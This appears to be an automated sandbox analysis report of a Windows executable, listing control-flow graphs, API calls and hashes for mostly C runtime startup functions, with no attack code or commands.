                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_000020FE), ref: 00402140
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 935903d1246056ec072c2b6f805f6196f3f8f058df6acf2eaccc246f31e18100
                          • Instruction ID: dcff0890bebcf140c8cc589396629a1fb90812a7206754ae37c15cb8782ea16a
                          • Opcode Fuzzy Hash: 935903d1246056ec072c2b6f805f6196f3f8f058df6acf2eaccc246f31e18100
                          • Instruction Fuzzy Hash: A29002A02923005AC64017709F0D50535906A4861275284756145F44E4DEF44098F519
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bcf88edd903997ba0d45f657b351e7f0d641ff21066f36589517d37c3ba8912e
                          • Instruction ID: 0e311bcd35e9ec61c2f1014f34d0078782a6940f0d525e91e9a8e8fef8a8f8c0
                          • Opcode Fuzzy Hash: bcf88edd903997ba0d45f657b351e7f0d641ff21066f36589517d37c3ba8912e
                          • Instruction Fuzzy Hash: A262AB316083658FD324DF28C48025ABBF1FF95344F554A2EE9A5CB360E735E949CB46

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 357 403d9d-403da4 350->357 354 403c1b-403c26 352->354 355 403cac-403cd0 call 405f60 352->355 354->352 358 403c28-403c2e 354->358 364 403cfc-403cff 355->364 359 403da5 call 401662 357->359 361 403c34-403c3a 358->361 362 403d9a 358->362 363 403daa-403dab 359->363 361->362 365 403c40-403c4c IsValidCodePage 361->365 362->357 367 403d01-403d11 364->367 368 403cd2-403cd7 364->368 365->362 366 403c52-403c5f GetCPInfo 365->366 369 403c65-403c83 call 405f60 366->369 370 403d8e-403d94 366->370 367->364 371 403d13-403d32 call 403825 367->371 368->367 372 403cd9-403cdf 368->372 380 403d81 369->380 381 403c89-403c8d 369->381 370->350 370->362 382 403d33-403d3e 371->382 375 403cf3-403cf5 372->375 378 403ce1-403cf2 375->378 379 403cf7-403cfb 375->379 378->375 379->364 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 389 403d6a-403d6f 384->389 387 403c96-403c9a 385->387 396 403d4c-403d51 386->396 387->384 390 403ca0-403ca7 387->390 389->389 392 403d71-403d7f call 403825 389->392 394 403d52-403d54 390->394 392->383 394->396 397 403d56-403d5c 394->397 396->394 397->384 397->387
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
